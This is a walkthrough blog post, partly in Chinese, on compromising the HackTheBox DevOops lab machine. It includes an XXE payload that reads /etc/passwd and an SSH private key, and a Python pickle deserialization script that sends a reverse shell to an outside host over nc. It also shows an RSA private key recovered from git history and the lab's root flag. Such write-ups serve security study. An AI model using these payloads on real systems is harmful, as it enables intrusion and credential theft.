文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox

VulnHub

代码审计

PHP代码审计

流量分析

机器学习

基础学习

Python

Python编程

Java

Java编程

算法

Leetcode

随笔

经验

技术

 2020-03-30   2.1k

HTB::DevOops Walkthrough

0x01 Info Card

0x02 Preliminary

Python unserialize

https://r1dd1er.top/2019/05/21/python安全之反序列化/

http://bendawang.site/2018/03/01/关于Python-sec的一些总结/

https://www.k0rz3n.com/2018/11/12/一篇文章带你理解漏洞之Python 反序列化漏洞/

http://www.code2sec.com/python-picklede-ren-yi-dai-ma-zhi-xing-lou-dong-shi-jian-he-payloadgou-zao.html

靶场:https://github.com/vulhub/vulhub/tree/master/python/unpickle

XXE Injection

https://ca0y1h.top/Web_security/basic_learning/20.xxe漏洞利用/

0x03 Tools and Tips

  • nmap
  • dirsearch
  • wfuzz
  • Python pickle unserialize
  • XXE read files
  • Git

0x04 Pentesting

Initial Enumeration

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Nmap 7.80 scan initiated Tue Mar 24 09:04:48 2020 as: nmap -sC -sV -oN ippsec_scan.txt 10.10.10.91
Nmap scan report for 10.10.10.91
Host is up (0.32s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 42:90:e3:35:31:8d:8b:86:17:2a:fb:38:90:da:c4:95 (RSA)
| 256 b7:b6:dc:c4:4c:87:9b:75:2a:00:89:83:ed:b2:80:31 (ECDSA)
|_ 256 d5:2f:19:53:b2:8e:3a:4b:b3:dd:3c:1f:c0:37:0d:00 (ED25519)
5000/tcp open http Gunicorn 19.7.1
|_http-server-header: gunicorn/19.7.1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 24 09:05:52 2020 -- 1 IP address (1 host up) scanned in 64.19 seconds

5000 port run as Python web server gunicorn,dirsearch and wfuzz scan directory

1
2
3
4
5
6
7
8
$ ./dirsearch -u http://10.10.10.91:5000/ -e *
Target: http://10.10.10.91:5000/

[02:21:18] Starting:
[02:24:47] 200 - 533KB - /feed
[02:27:26] 200 - 347B - /upload

Task Completed
1
2
3
4
5
$ wfuzz --hc=404 -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.10.91:5000/FUZZ
...
000000126: 200 1815 L 24122 517022 Ch "feed"
000000366: 200 0 L 39 W 347 Ch "upload"
000019602: 405 4 L 23 W 178 Ch "newpost"

Getting User Flag

visit the homepage

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<html>
<body>
Under construction!<br>
<p>
This is feed.py, which will become the MVP for Blogfeeder application.
</p>
<p>
TODO: replace this with the proper feed from the dev.solita.fi backend.
</p>
<p>
<img src="/feed" align="center" width="60%" height="60%">
</p>
</body>
</html>

visit http://10.10.10.91:5000/upload, it should upload xml file including Author, Subject, Content elements. Try to upload a normal xml file.

1
2
3
4
5
6
<?xml version="1.0"?>
<body>
<Author>author</Author>
<Subject>subject</Subject>
<Content>content</Content>
</body>

return a comfirmation and file path.

1
PROCESSED BLOGPOST: Author: author Subject: subject Content: content URL for later reference: /uploads/test.xml File path: /home/roosa/deploy/src

now, I try to upload an evil xml file that can read files

1
2
3
4
5
6
7
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Author [<!ENTITY file SYSTEM "file:///etc/passwd">]>
<Author>
<Subject>ca01h</Subject>
<Content>njupt</Content>
&file;
</Author>

Visit http://10.10.10.91:5000/uploads/evil.xml, success to return /etc/passwd file.

1
2
3
PROCESSED BLOGPOST: Author: njupt root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin
......
roosa:x:1002:1002:,,,:/home/roosa:/bin/bash sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin blogfeed:x:1003:1003:,,,:/home/blogfeed:/bin/false Subject: ca01h Content: njupt URL for later reference: /uploads/evil.xml File path: /home/roosa/deploy/src

结合首页的feed.py提示,以及上传成功后的信息/home/roosa/deploy/src,猜测网站的源码应该是放在这个目录,然后我们尝试访问/home/roosa/deploy/src/feed.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
def uploaded_file(filename):
return send_from_directory(Config.UPLOAD_FOLDER, filename)

@app.route("/")
def xss():
return template('index.html')

@app.route("/feed")
def fakefeed():
return send_from_directory(".","devsolita-snapshot.png")

@app.route("/newpost", methods=["POST"])
def newpost():
# TODO: proper save to database, this is for testing purposes right now
picklestr = base64.urlsafe_b64decode(request.data)
# return picklestr
postObj = pickle.loads(picklestr)
return "POST RECEIVED: " + postObj['Subject']

## TODO: VERY important! DISABLED THIS IN PRODUCTION
#app = DebuggedApplication(app, evalex=True, console_path='/debugconsole')
# TODO: Replace run-gunicorn.sh with real Linux service script
#app = DebuggedApplication(app, evalex=True, console_path='/debugconsole')

if __name__ == "__main__":
app.run(host='0.0.0,0', Debug=True)

有了前面Python反序列化的基础,就很容易看出来postObj = pickle.loads(picklestr) 这条语句存在反序列化漏洞。写一个Python脚本反弹shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import pickle
import requests
import os
import base64

url = "http://10.10.10.91:5000/newpost"
headers = {"Content-Type": "text/plain"}
code = 'rm /tmp/x;mkfifo /tmp/x;cat /tmp/x|/bin/sh -i 2>&1|nc 10.10.16.99 9000 >/tmp/x'


class Devoops(object):
def __reduce__(self):
return (os.system, (code,))


payload = base64.urlsafe_b64encode(pickle.dumps(Devoops()))
print(payload)
r = requests.post(url=url, data=payload, headers=headers, allow_redirects=False)
print(r.text)

一定要用Python2执行脚本,因为py2和py3序列化后的结果是完全不一样的

本机监听端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ nc -lvvp 9000 
listening on [any] 9000 ...
10.10.10.91: inverse host lookup failed: Unknown host
connect to [10.10.16.99] from (UNKNOWN) [10.10.10.91] 44014
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo)
$ python -c "import pty;pty.spawn('/bin/bash')"
[email protected]:~/deploy/src$ id
id
uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo)
[email protected]:~/deploy/src$ cd && ls -a user.txt
cd && ls -a user.txt
user.txt

还有一种更简单的方法。对于目标靶机只有只读的访问权限,这篇文章提示了我们应查找的文件。 在这种情况下,我们可以访问roosa主目录的id_rsa文件:

1
2
3
4
5
6
7
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Author [<!ENTITY file SYSTEM "file:///home/roosa/.ssh/id_rsa">]>
<Author>
<Subject>ca01h</Subject>
<Content>njupt</Content>
&file;
</Author>

获取后保存到本机,用ssh登录靶机:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# kali @ kali in ~/HackTheBox/DevOops [2:01:04] 
$ chmod 600 id_rsa

# kali @ kali in ~/HackTheBox/DevOops [2:01:19]
$ ssh -i id_rsa [email protected]
The authenticity of host '10.10.10.91 (10.10.10.91)' can't be established.
ECDSA key fingerprint is SHA256:hbD2D4PdnIVpAFHV8sSAbtM0IlTAIpYZ/nwspIdp4Vg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.91' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

[email protected]:~$ id
uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo)

Getting Root Flag

成功登录之后,看一下.bash_history,有几个关键的git命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
...
mkdir integration/auth_credentials.key
nano integration/auth_credentials.key/
ls -altr
chmod go-rwx authcredentials.key
...
rm -Rf resources/integration/auth_credentials.key
mv resources/authcredentials.key resources/integration/
git add resources/integration/authcredentials.key
git commit -m 'add key for feed integration from tnerprise backend'
...
ssh-keygen
...
cat kak
cp kak resources/integration/authcredentials.key
git add resources/integration/authcredentials.key
git commit -m 'reverted accidental commit with proper key'

去git本地仓库看一下提交历史

1
2
3
4
5
6
7
8
9
[email protected]:~/work/blogfeed$ git log --pretty=oneline
7ff507d029021b0915235ff91e6a74ba33009c6d Use Base64 for pickle feed loading
26ae6c8668995b2f09bf9e2809c36b156207bfa8 Set PIN to make debugging faster as it will no longer change every time the application code is changed. Remember to remove before production use.
cec54d8cb6117fd7f164db142f0348a74d3e9a70 Debug support added to make development more agile.
ca3e768f2434511e75bd5137593895bd38e1b1c2 Blogfeed app, initial version.
dfebfdfd9146c98432d19e3f7d83cc5f3adbfe94 Gunicorn startup script
33e87c312c08735a02fa9c796021a4a3023129ad reverted accidental commit with proper key
d387abf63e05c9628a59195cec9311751bdb283f add key for feed integration from tnerprise backend
1422e5a04d1b52a44e6dc81023420347e257ee5f Initial commit

回退到第二个commit版本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
[email protected]:~/work/blogfeed/resources/integration$ git reset --hard d387abf63e05c9628a59195cec9311751bdb283f
HEAD is now at d387abf add key for feed integration from tnerprise backend
[email protected]:~/work/blogfeed/resources/integration$ ls -la
total 12
drwxrwxr-x 2 roosa roosa 4096 Mar 30 02:42 .
drwxrwxr-x 3 roosa roosa 4096 Mar 30 02:39 ..
-rw-rw-r-- 1 roosa roosa 1676 Mar 30 02:42 authcredentials.key
[email protected]:~/work/blogfeed/resources/integration$ cat authcredentials.key
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEArDvzJ0k7T856dw2pnIrStl0GwoU/WFI+OPQcpOVj9DdSIEde
8PDgpt/tBpY7a/xt3sP5rD7JEuvnpWRLteqKZ8hlCvt+4oP7DqWXoo/hfaUUyU5i
vr+5Ui0nD+YBKyYuiN+4CB8jSQvwOG+LlA3IGAzVf56J0WP9FILH/NwYW2iovTRK
nz1y2vdO3ug94XX8y0bbMR9Mtpj292wNrxmUSQ5glioqrSrwFfevWt/rEgIVmrb+
CCjeERnxMwaZNFP0SYoiC5HweyXD6ZLgFO4uOVuImILGJyyQJ8u5BI2mc/SHSE0c
F9DmYwbVqRcurk3yAS+jEbXgObupXkDHgIoMCwIDAQABAoIBAFaUuHIKVT+UK2oH
uzjPbIdyEkDc3PAYP+E/jdqy2eFdofJKDocOf9BDhxKlmO968PxoBe25jjjt0AAL
gCfN5I+xZGH19V4HPMCrK6PzskYII3/i4K7FEHMn8ZgDZpj7U69Iz2l9xa4lyzeD
k2X0256DbRv/ZYaWPhX+fGw3dCMWkRs6MoBNVS4wAMmOCiFl3hzHlgIemLMm6QSy
NnTtLPXwkS84KMfZGbnolAiZbHAqhe5cRfV2CVw2U8GaIS3fqV3ioD0qqQjIIPNM
HSRik2J/7Y7OuBRQN+auzFKV7QeLFeROJsLhLaPhstY5QQReQr9oIuTAs9c+oCLa
2fXe3kkCgYEA367aoOTisun9UJ7ObgNZTDPeaXajhWrZbxlSsOeOBp5CK/oLc0RB
GLEKU6HtUuKFvlXdJ22S4/rQb0RiDcU/wOiDzmlCTQJrnLgqzBwNXp+MH6Av9WHG
jwrjv/loHYF0vXUHHRVJmcXzsftZk2aJ29TXud5UMqHovyieb3mZ0pcCgYEAxR41
IMq2dif3laGnQuYrjQVNFfvwDt1JD1mKNG8OppwTgcPbFO+R3+MqL7lvAhHjWKMw
+XjmkQEZbnmwf1fKuIHW9uD9KxxHqgucNv9ySuMtVPp/QYtjn/ltojR16JNTKqiW
7vSqlsZnT9jR2syvuhhVz4Ei9yA/VYZG2uiCpK0CgYA/UOhz+LYu/MsGoh0+yNXj
Gx+O7NU2s9sedqWQi8sJFo0Wk63gD+b5TUvmBoT+HD7NdNKoEX0t6VZM2KeEzFvS
iD6fE+5/i/rYHs2Gfz5NlY39ecN5ixbAcM2tDrUo/PcFlfXQhrERxRXJQKPHdJP7
VRFHfKaKuof+bEoEtgATuwKBgC3Ce3bnWEBJuvIjmt6u7EFKj8CgwfPRbxp/INRX
S8Flzil7vCo6C1U8ORjnJVwHpw12pPHlHTFgXfUFjvGhAdCfY7XgOSV+5SwWkec6
md/EqUtm84/VugTzNH5JS234dYAbrx498jQaTvV8UgtHJSxAZftL8UAJXmqOR3ie
LWXpAoGADMbq4aFzQuUPldxr3thx0KRz9LJUJfrpADAUbxo8zVvbwt4gM2vsXwcz
oAvexd1JRMkbC7YOgrzZ9iOxHP+mg/LLENmHimcyKCqaY3XzqXqk9lOhA3ymOcLw
LS4O7JPRqVmgZzUUnDiAVuUHWuHGGXpWpz9EGau6dIbQaUUSOEE=
-----END RSA PRIVATE KEY-----

拷贝到本机保存,再用ssh登录靶机

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ chmod 600 root_id_rsa 

# kali @ kali in ~/HackTheBox/DevOops [2:44:48]
$ ssh -i root_id_rsa [email protected]
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Mon Mar 26 06:23:48 2018 from 192.168.57.1
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~# cat root.txt
d4fe1e7f7187407eebdd3209cb1ac7b3

0x05 Reference

https://epi052.gitlab.io/notes-to-self/blog/2018-10-11-hack-the-box-devoops/

Copyright © ca01h 2019-2020 | 本站总访问量